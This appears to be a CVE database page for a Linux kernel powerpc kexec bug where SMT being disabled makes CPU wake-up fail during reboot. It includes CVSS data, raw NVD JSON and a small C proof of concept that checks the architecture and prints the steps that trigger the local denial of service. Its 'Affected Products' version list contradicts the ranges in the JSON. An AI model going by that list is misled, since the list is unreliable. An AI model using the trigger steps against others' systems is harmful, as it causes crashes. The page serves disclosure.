Security Vulnerability Report
CVE-2025-71119 CVSS 5.5 MEDIUM

CVE-2025-71119

Published: 2026-01-14 15:16:02
Last Modified: 2026-03-25 18:46:03
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

powerpc/kexec: Enable SMT before waking offline CPUs

If SMT is disabled or a partial SMT state is enabled, when a new kernel image is loaded for kexec, on reboot the following warning is observed:

    kexec: Waking offline cpu 228.
    WARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc
    [snip]
     NIP kexec_prepare_cpus+0x1b0/0x1bc
     LR kexec_prepare_cpus+0x1a0/0x1bc
     Call Trace:
      kexec_prepare_cpus+0x1a0/0x1bc (unreliable)
      default_machine_kexec+0x160/0x19c
      machine_kexec+0x80/0x88
      kernel_kexec+0xd0/0x118
      __do_sys_reboot+0x210/0x2c4
      system_call_exception+0x124/0x320
      system_call_vectored_common+0x15c/0x2ec

This occurs as add_cpu() fails due to cpu_bootable() returning false for CPUs that fail the cpu_smt_thread_allowed() check or non primary threads if SMT is disabled.

Fix the issue by enabling SMT and resetting the number of SMT threads to the number of threads per core, before attempting to wake up all present CPUs.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel 6.6 < 6.6.55
Linux kernel 6.11 < 6.11.8
Linux kernel 6.12 < 6.12.1
Linux kernel mainline < 6.13-rc4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-71119 PoC - Local DoS via kexec on powerpc with SMT disabled
// This PoC demonstrates the condition that triggers the vulnerability
// Requirements: powerpc architecture, SMT disabled or partially enabled
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

int main(void)
{
    printf("[*] CVE-2025-71119 Trigger PoC\n");
    printf("[*] Target: Linux kernel powerpc kexec with SMT disabled\n\n");

    // Check if running on powerpc. uname() is used because /proc/cpuinfo on
    // powerpc lists the CPU model (e.g. POWER9), not the architecture name.
    struct utsname uts;
    if (uname(&uts) != 0) {
        printf("[-] Cannot determine machine architecture\n");
        return 1;
    }
    // Machine strings on powerpc are "ppc", "ppc64" or "ppc64le"
    if (strncmp(uts.machine, "ppc", 3) != 0) {
        printf("[-] Not running on PowerPC architecture\n");
        printf("[-] This vulnerability only affects PowerPC systems\n");
        return 1;
    }
    printf("[+] Running on PowerPC architecture\n");

    // Check SMT status (the file holds 0 or 1 followed by a newline)
    FILE *smt_file = fopen("/sys/devices/system/cpu/smt/active", "r");
    if (smt_file) {
        char smt_status[8];
        if (fgets(smt_status, sizeof(smt_status), smt_file)) {
            printf("[*] SMT status: %s", smt_status);
        }
        fclose(smt_file);
    }

    printf("\n[*] To trigger this vulnerability:\n");
    printf(" 1. Disable SMT: echo off > /sys/devices/system/cpu/smt/control\n");
    printf(" 2. Load new kernel: kexec -l /boot/vmlinuz-new --initrd=/boot/initrd.img-new\n");
    printf(" 3. Trigger kexec: reboot or kexec -e\n");
    printf(" 4. Observe warning in dmesg: 'kexec: Waking offline cpu XXX'\n\n");
    printf("[*] Expected result: Kernel warning at arch/powerpc/kexec/core_64.c\n");
    printf("[*] Impact: Local DoS - system instability or crash during kexec reboot\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71119", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.583", "lastModified": "2026-03-25T18:46:03.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\npowerpc/kexec: Habilitar SMT antes de activar las CPU sin conexión\n\nSi SMT está deshabilitado o un estado SMT parcial está habilitado, cuando una nueva imagen de kernel se carga para kexec, al reiniciar se observa la siguiente advertencia:\n\nkexec: Activando cpu 228 sin conexión.\nADVERTENCIA: CPU: 0 PID: 9062 en arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Traza de llamada:\n kexec_prepare_cpus+0x1a0/0x1bc (no fiable)\n default_machine_kexec+0x160/0x19c\n 
machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nEsto ocurre porque add_cpu() falla debido a que cpu_bootable() devuelve falso para las CPU que fallan la verificación cpu_smt_thread_allowed() o hilos no primarios si SMT está deshabilitado.\n\nSoluciona el problema habilitando SMT y restableciendo el número de hilos SMT al número de hilos por núcleo, antes de intentar activar todas las CPU presentes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.72", "versionEndExcluding": "6.1.160", "matchCriteriaId": "A16C0F70-6082-4AEE-BDEF-76E8CA8FB720"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.12", "versionEndExcluding": "6.6", "matchCriteriaId": "AFD63F94-BD00-4EF2-9873-45E8DED18B9A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.1", "versionEndExcluding": "6.6.120", "matchCriteriaId": "C5F84D90-D922-47D3-B042-99569840DD8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", 
"matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:*", "matchCriteriaId": "E346B162-D566-4E62-ABDE-ECBFB21B8BFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, ... (truncated)